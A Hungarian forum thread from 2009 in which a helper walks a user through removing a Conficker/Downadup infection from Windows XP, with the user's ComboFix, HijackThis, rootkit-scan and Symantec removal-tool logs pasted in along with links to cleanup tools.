[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0autocheck ??$\0autocheck T?M??

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\concept design\\onlineTV 3\\onlineTV.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\RM.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\Studio.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\PMSRegisterFile.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\umi.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\WINDOWS\\system32\\lxcccoms.exe"=
"c:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\lxccpswx.exe"=
"c:\\Program Files\\VoipCheapCom\\VoipCheapCom.exe"=
"c:\\Program Files\\Messenger\\Msmsgs.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\java.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5121:TCP"= 5121:TCP:messenger
"21858:TCP"= 21858:TCP:BitComet 21858 TCP
"21858:UDP"= 21858:UDP:BitComet 21858 UDP
"26636:TCP"= 26636:TCP:BitComet 26636 TCP
"26636:UDP"= 26636:UDP:BitComet 26636 UDP
"7387:TCP"= 7387:TCP:messenger
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"1253:TCP"= 1253:TCP:messenger
"135:TCP"= 135:TCP:TCP Port 135
"5000:TCP"= 5000:TCP:TCP Port 5000
"5001:TCP"= 5001:TCP:TCP Port 5001
"5002:TCP"= 5002:TCP:TCP Port 5002
"5003:TCP"= 5003:TCP:TCP Port 5003
"5004:TCP"= 5004:TCP:TCP Port 5004
"5005:TCP"= 5005:TCP:TCP Port 5005
"5006:TCP"= 5006:TCP:TCP Port 5006
"5007:TCP"= 5007:TCP:TCP Port 5007
"5008:TCP"= 5008:TCP:TCP Port 5008
"5009:TCP"= 5009:TCP:TCP Port 5009
"5010:TCP"= 5010:TCP:TCP Port 5010
"5011:TCP"= 5011:TCP:TCP Port 5011
"5012:TCP"= 5012:TCP:TCP Port 5012
"5013:TCP"= 5013:TCP:TCP Port 5013
"5014:TCP"= 5014:TCP:TCP Port 5014
"5015:TCP"= 5015:TCP:TCP Port 5015
"5016:TCP"= 5016:TCP:TCP Port 5016
"5017:TCP"= 5017:TCP:TCP Port 5017
"5018:TCP"= 5018:TCP:TCP Port 5018
"5019:TCP"= 5019:TCP:TCP Port 5019
"5020:TCP"= 5020:TCP:TCP Port 5020
"7533:TCP"= 7533:TCP:messenger
"2562:TCP"= 2562:TCP:messenger
"3117:TCP"= 3117:TCP:messenger
"8743:TCP"= 8743:TCP:messenger
"3325:TCP"= 3325:TCP:messenger
"6243:TCP"= 6243:TCP:messenger
"5575:TCP"= 5575:TCP:messenger
"5764:TCP"= 5764:TCP:messenger
"6274:TCP"= 6274:TCP:messenger
"7611:TCP"= 7611:TCP:messenger
"1721:TCP"= 1721:TCP:messenger
"2821:TCP"= 2821:TCP:messenger
"7754:TCP"= 7754:TCP:messenger
"3354:TCP"= 3354:TCP:messenger

R0 fsbts;fsbts;c:\windows\system32\drivers\fsbts.sys [2009.06.19. 19:18 26624]
R0 PCTCore;PCTools KDS;c:\windows\system32\drivers\PCTCore.sys [2009.06.18. 8:02 130936]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009.01.13. 19:16 114768]
R1 nltdi;nltdi;c:\windows\system32\drivers\nltdi.sys [2007.04.23. 13:03 82200]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2008.12.22. 12:06 8944]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [2008.12.22. 12:05 55024]
R1 vbev5mp;vbev5mp;c:\windows\system32\drivers\VBEV5MP.sys [2003.11.12. 9:26 56064]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009.01.13. 19:16 20560]
R2 thdudf;TOSHIBA UDF2.5 Reader File System Driver;c:\windows\system32\drivers\thdudf.sys [2008.11.23. 10:47 66944]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;c:\windows\system32\drivers\AtiHdmi.sys [2009.06.10. 21:12 99856]
S2 OMSCAN;OMSCAN;\Sys --> \Sys [?]
S2 PStrip;PSTRIP;\??\c:\windows\system32\DRIVERS\PSTRIP.SYS --> c:\windows\system32\DRIVERS\PSTRIP.SYS [?]
S2 SOFTLOK;SOFTLOK; [x]
S3 RkPavproc1;RkPavproc1;\??\c:\windows\system32\drivers\RkPavproc1.sys --> c:\windows\system32\drivers\RkPavproc1.sys [?]
S3 SASENUM;SASENUM;c:\program files\SUPERAntiSpyware\SASENUM.SYS [2008.12.22. 12:06 7408]
S3 sdAuxService;PC Tools Auxiliary Service;c:\program files\Spyware Doctor\pctsAuxs.exe [2009.01.13. 23:01 348752]
S3 SndTAudio;SndTAudio;c:\windows\system32\drivers\SndTAudio.sys [2009.02.21. 16:49 23096]
S3 SndTVideo;SndTVideo;c:\windows\system32\drivers\SndTVideo.sys [2009.02.21. 16:49 3768]
S3 TNPacket;T-Systems Nova Packet Capture Driver;c:\progra~1\MATVAD~1\TNPACKET.SYS [2002.10.09. 14:38 9376]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{B2C3BB6B-E005-4246-B8E5-DF0A4D073CDC}]
c:\program files\PixiePack Codec Pack\InstallerHelper.exe
.
Contents of the 'Scheduled Tasks' folder

2009-06-13 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 11:34]
.
.
------- Supplementary Scan -------
.
IE: Az összes letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlall.htm
IE: Kijelölés letöltése Free Download Managerrel - file://c:\program files\Free Download Manager\dlselected.htm
IE: Letöltés Free Download Managerrel - file://c:\program files\Free Download Manager\dllink.htm
IE: Video letöltése a Free Download Manager-rel - file://c:\program files\Free Download Manager\dlfvideo.htm
FF - ProfilePath -
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-06-20 08:41
Windows 5.1.2600 Szervizcsomag 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
LXCCCATS = rundll32 c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\OMSCAN]
"ImagePath"="\Sys"

[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\vbev5mp]
"ImagePath"="system32\DRIVERS\vbev5mp.sys"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6BC31396-740D-B4B5-B08B-BC74AF917057}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"oamgpcigfaaenpmnfhmdlibbdkgljh"=hex:64,61,6d,69,6c,62,62,6a,00,80
"oaagfogeicofmdgkidomfbofldjfcb"=hex:6a,61,62,6a,65,63,6c,68,66,6f,65,65,6f,69,
61,6d,66,63,62,61,00,fd
"nagbfafnaficdjjghlpnjmolhmie"=hex:6a,61,62,6a,65,63,6c,68,66,6f,65,65,6f,69,
61,6d,66,63,62,61,00,fd
"eaibpofbol"=hex:65,61,6b,65,69,69,61,6a,69,6d,00,77
"calgna"=hex:69,61,6d,69,69,6e,68,65,62,65,67,6f,64,66,6e,6e,64,6a,00,ff

[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{A873A6C7-2DF7-2ABE-BD1E-352FFC8F3EDB}*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
"ianhjpccamlebclpdj"=hex:6c,61,6a,63,69,6a,68,6f,68,61,62,6a,61,63,68,6e,70,63,
64,63,6f,6a,70,64,00,00
"hadhpenhafikchhp"=hex:6c,61,6a,63,69,6a,68,6f,68,61,62,6a,61,63,68,6e,70,63,
64,63,6f,6a,70,64,00,00
"hajejenaljhiekcp"=hex:70,61,68,65,70,64,6b,64,62,64,67,61,6a,66,67,62,6d,62,
63,69,70,66,63,69,63,69,6e,69,6c,70,61,66,00,ff
"hajejenaiimmdlif"=hex:70,61,6a,63,69,6a,68,6f,69,62,65,67,6b,63,63,6c,68,68,
6c,62,63,63,69,63,6f,69,61,6d,66,6d,61,64,00,ff

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\ProgID]
@DACL=(02 0000)
@="AcroIEHelper.AcroIEHlprObj.1"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\Programmable]
@DACL=(02 0000)
@=""

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\TypeLib]
@DACL=(02 0000)
@="{5F226421-415D-408D-9A09-0DCD94E25B48}"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\VersionIndependentProgID]
@DACL=(02 0000)
@="AcroIEHelper.AcroIEHlprObj"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"cd042efbbd7f7af1647644e76e06692b"=hex:e2,63,26,f1,3f,c8,ff,68,1f,4a,1f,62,be,
75,3a,b2,e2,63,26,f1,3f,c8,ff,68,e9,b3,86,b8,e4,d1,ea,3b,e2,63,26,f1,3f,c8,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"bca643cdc5c2726b20d2ecedcc62c59b"=hex:6a,9c,d6,61,af,45,84,18,01,89,d4,a0,4f,
6e,fc,9a,6a,9c,d6,61,af,45,84,18,21,a0,43,91,1b,6a,36,7e,6a,9c,d6,61,af,45,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2c81e34222e8052573023a60d06dd016"=hex:ff,7c,85,e0,43,d4,0e,fe,06,03,14,1d,04,
bb,49,9f,ff,7c,85,e0,43,d4,0e,fe,ec,a9,de,5a,81,77,d1,a7,ff,7c,85,e0,43,d4,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2582ae41fb52324423be06337561aa48"=hex:86,8c,21,01,be,91,eb,e7,f2,f2,ac,06,dc,
4c,8a,90,86,8c,21,01,be,91,eb,e7,84,e4,60,c6,bf,7f,2d,5c,86,8c,21,01,be,91,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"caaeda5fd7a9ed7697d9686d4b818472"=hex:cd,44,cd,b9,a6,33,6c,cd,8d,bf,95,fa,37,
aa,87,bc,f5,1d,4d,73,a8,13,5c,05,0f,12,eb,28,47,52,54,3e,f5,1d,4d,73,a8,13,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"a4a1bcf2cc2b8bc3716b74b2b4522f5d"=hex:df,20,58,62,78,6b,cf,c8,b4,bc,e3,1d,26,
3f,bb,68,df,20,58,62,78,6b,cf,c8,68,17,3e,93,cf,44,38,83,df,20,58,62,78,6b,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"4d370831d2c43cd13623e232fed27b7b"=hex:97,20,4e,9a,c7,f1,35,ee,f8,4a,92,73,bb,
9d,91,3c,fb,a7,78,e6,12,2f,9a,ea,a5,1d,f7,8f,b2,28,4c,55,fb,a7,78,e6,12,2f,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1d68fe701cdea33e477eb204b76f993d"=hex:01,3a,48,fc,e8,04,4a,f1,6a,37,68,67,7f,
24,23,a7,01,3a,48,fc,e8,04,4a,f1,1a,1a,2d,37,d5,36,0f,8f,01,3a,48,fc,e8,04,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1fac81b91d8e3c5aa4b0a51804d844a3"=hex:51,fa,6e,91,28,9e,14,cc,8d,a5,ea,04,7c,
4e,07,ae,f6,0f,4e,58,98,5b,89,c9,bf,31,4b,2e,bc,38,22,b9,f6,0f,4e,58,98,5b,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"f5f62a6129303efb32fbe080bb27835b"=hex:3d,ce,ea,26,2d,45,aa,78,c2,de,89,dc,25,
fd,22,42,3d,ce,ea,26,2d,45,aa,78,45,b0,b2,5b,5f,e7,a2,55,3d,ce,ea,26,2d,45,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"fd4e2e1a3940b94dceb5a6a021f2e3c6"=hex:2a,b7,cc,b5,b9,7f,41,e7,28,80,fe,74,82,
c9,f3,1e,2a,b7,cc,b5,b9,7f,41,e7,c8,92,0b,9d,1c,07,4a,f2,2a,b7,cc,b5,b9,7f,\

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"8a8aec57dd6508a385616fbc86791ec2"=hex:6c,43,2d,1e,aa,22,2f,9c,e9,f9,e4,60,f0,
ba,22,6b,6c,43,2d,1e,aa,22,2f,9c,93,70,70,73,73,0b,0b,30,6c,43,2d,1e,aa,22,\

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\•€|˙˙˙˙"•€|ţ»Ów*]
"AB141C35E9F4BF344B9FC010BB17F68A"="02:\\Software\\Adobe\\FeatureSubscriptions\\DVAAdobeDocMeta\\{53C141BA-4F9E-43FB-B4F9-0C01BB716FA8}\\Registered"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
"DisplayName"="?\11"
"DeviceDesc"="?\11"
"ProviderName"="?\11???\11\08"
"MFG"="??\09"
"ReinstallString"="8.470.0.0000"
"DeviceInstanceIds"=multi:"k:\\driver\\ati driver\\xp\\driver\\xp_inf\\cx_60150.inf\00"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1612)
c:\program files\SUPERAntiSpyware\SASWINLO.dll
c:\windows\system32\Ati2evxx.dll

- - - - - - - > 'lsass.exe'(1676)
c:\windows\system32\relog_ap.dll

- - - - - - - > 'explorer.exe'(5756)
c:\program files\ComfortClipboard\CClipboardH.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\msi.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\Acronis\Schedule2\schedul2.exe
c:\program files\ComfortClipboard\CClipboardCm.exe
c:\program files\Virtual CD v5\System\VC5Tray.exe
c:\windows\ATKKBService.exe
c:\program files\cFosSpeed\spd.exe
c:\program files\Comodo\Firewall\cmdagent.exe
c:\program files\Diskeeper Corporation\Diskeeper\DkService.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
c:\windows\system32\lvhidsvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\program files\NetLimiter 2 Pro\nlsvc.exe
c:\program files\CDBurnerXP\NMSAccessU.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\HHVcdV5Sys\VC5SecS.exe
c:\program files\NetLimiter 2 Pro\NLClient.exe
c:\program files\Alwil Software\Avast4\ashMaiSv.exe
c:\program files\Alwil Software\Avast4\ashWebSv.exe
c:\windows\system32\lxcccoms.exe
.
**************************************************************************
.
Completion time: 2009-06-20 8:46 - machine was rebooted
ComboFix-quarantined-files.txt 2009-06-20 06:46
ComboFix2.txt 2009-01-13 13:05

Pre-Run: 341 467 136 bájt szabad
Post-Run: 686 092 288 bájt szabad

Current=3 Default=3 Failed=2 LastKnownGood=4 Sets=1,2,3,4
461


Itt a Downadup log-ja is


Symantec W32.Downadup Removal Tool 1.0.5

C:\32788R22FWJFW\setcsum.cfexe: failed in scanning.
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\VK33IP8M\kxkmcghi[1].gif: W32.Downadup.B (unrepairable) (deleted)
C:\WINDOWS\system32\x: W32.Downadup.B (unrepairable) (deleted)
F:\JÁTÉKMAYGARÍTÁSOK\Delta Force Black Hawk Down cracks\Delta_Force Crack\Delta Force Black Hawk Down Crack by EFC87\efc87 - Delta Force - Black Hawk Down Crack.exe: failed in scanning.
F:\Programok,egyebek\MÁSOLÁS\MÁSOLÁS VÉDELEM\PROGRAMOK\(Hacker Stuff) - Softice 9X-Nt-2K,w32Dasm,Hiew,Hex Workshop, Tools To Crack Cracked Software\swlipi32\swlipi32.exe: failed in scanning.
F:\Programok,egyebek\SEGÉD ÉS RENDSZER PROGRAMOK\Töredezettség mentesítők\Disk Watchman\Disk Watchman v1.7.151 Incl.Keygen-ECLiPSE\setup_pack\dwsetup.exe: failed in scanning.
F:\Programok,egyebek\SEGÉD ÉS RENDSZER PROGRAMOK\Töredezettség mentesítők\Disk Watchman\Disk Watchman1.5 158.exe: failed in scanning.
scheduled job: Unable to enumerate scheduled jobs. Returned status 2184

registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List: 8806:TCP (value deleted)
registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets: dl (value deleted)
registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets: ds (value deleted)
registry: HKLM\system\CurrentControlSet\Services\BITS: Start (value set to 0x00000003 (3))

W32.Downadup has been successfully removed from your computer!

Here is the report:

The total number of the scanned files: 418130
The number of deleted threat files: 2
The number of threat processes terminated: 0
The number of threat threads terminated: 0
The number of registry entries fixed: 4


szomb. jún. 20, 2009 7:56
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
ok,csinald meg amit irtam es majd holnap folytatlyuk,


pén. jún. 19, 2009 20:46
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
az autorun-t már régebben kilőttük , a rendszer visszáll. szintén kilőttük régebben ,( de megcsináltam amit most írtál) a csökkentett módban elindulás rendkivül nehezen indult(7 perc agyalás után), most futnak a keresők csökkentett módban , de ezek eltartanak egy darabig és nekem dolgoznom kell mennnem , ha holnap vagy akkor holnap folytatnánk

most egy másik gépről írok


pén. jún. 19, 2009 18:18
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
oké , csinálom


pén. jún. 19, 2009 17:46
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
ok,a geped megvan tamadva confickeral,vegig csinalod eztet
:arrow:
Idézet:
Kattintson a Start gombra, majd Beállítások, Vezérkőpult.
Kattintson duplán a "Rendszer"-re és utána arra hogy "A rendszer visszaállítása". Pipálja ki a "A rendszer visszaállítás kikapcsolása az összes meghajtón" és kattintson arra hogy "Alkalmazás". Indítsa újra a gépet.

:arrow: kikapcsolni az autorun es az autoplayt evel a programal
http://download.viry.cz/tools/autorun.zip
letoltod futatod restart,,
:arrow: kapcsold a gepbe az USB-kulcsokat,Pendrivat,,,es hagyd be kapcsolva ,
:arrow: letoltod ezt a 2-programot es lefutatod mind a 2-tott csokentet modban-amit majd add >>> logott ted ide.
http://download.viry.cz/removers/FixDownadup.exe
ftp://ftp.f-secure.com/anti-virus/tools ... wnadup.zip
:arrow:
Idézet:
letoltod a combofixet rendes windowsban es lefutatod igy-a logot ted ide,
Toldsle ezt a combofixett ted az ASZTALRA,mindent bezarsz kapcsold ki a ha van akorr a Spyware Terminator pajzat es +SpybotTeaTimer pajzat is ha van., .Nemfuthatt semmi program,Futatod mint rendszergazda rendesen Windowsba-2x-klik ikona combofix>beleegyezes......
Es mostan csak nezni fogod nembabralni semmitt a gepp sajatt maga restartoll befejezi a scent ,csinall combofix .txt,eztett ide teszed es
http://download.bleepingcomputer.com/sUBs/ComboFix.exe


pén. jún. 19, 2009 14:18
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Ja , és svchost.exe folyamatosan memóriacím:written hibát jelez , ha leokézom a gép lefagy.


pén. jún. 19, 2009 11:24
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
Logfile of random's system information tool 1.06 (written by random/random)
Run by PALI at 2009-06-19 11:53:00
Microsoft Windows XP Professional Szervizcsomag 2
System drive C: has 515 MB (2%) free of 30 GB
Total RAM: 1023 MB (42% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:53:14, on 2009.06.19.
Platform: Windows XP Szervizcsomag 2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0013)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\TVR\RecSche.exe
C:\Program Files\ChrisTV\ChrisTV_Agent.exe
C:\Program Files\Lexmark 3300 Series\lxccmon.exe
C:\Program Files\cFosSpeed\cFosSpeed.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\HHVcdV5Sys\VC5Play.exe
C:\Program Files\Unlocker\UnlockerAssistant.exe
C:\Program Files\ComfortClipboard\CClipboard.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\Comodo\Firewall\CPF.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Spyware Doctor\pctsTray.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\ATKKBService.exe
C:\Program Files\ComfortClipboard\CClipboardCm.exe
C:\Program Files\cFosSpeed\spd.exe
C:\Program Files\Virtual CD v5\System\VC5Tray.exe
C:\Program Files\DAEMON Tools\daemon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\system32\lvhidsvc.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\NetLimiter 2 Pro\nlsvc.exe
C:\Program Files\CDBurnerXP\NMSAccessU.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files\HHVcdV5Sys\VC5SecS.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\system32\lxcccoms.exe
C:\WINDOWS\System32\alg.exe
C:\wincmd\WINCMD32.EXE
C:\Program Files\uTorrent\uTorrent.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Downloads\RSIT.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
c:\Program Files\HijackThis\PALI.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,First Home Page = http://go.microsoft.com/fwlink/?LinkId=54843
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: SnagIt Toolbar Loader - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\Snagit 9\SnagitBHO.dll
O2 - BHO: Adobe PDF Reader hivatkozássúgó - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
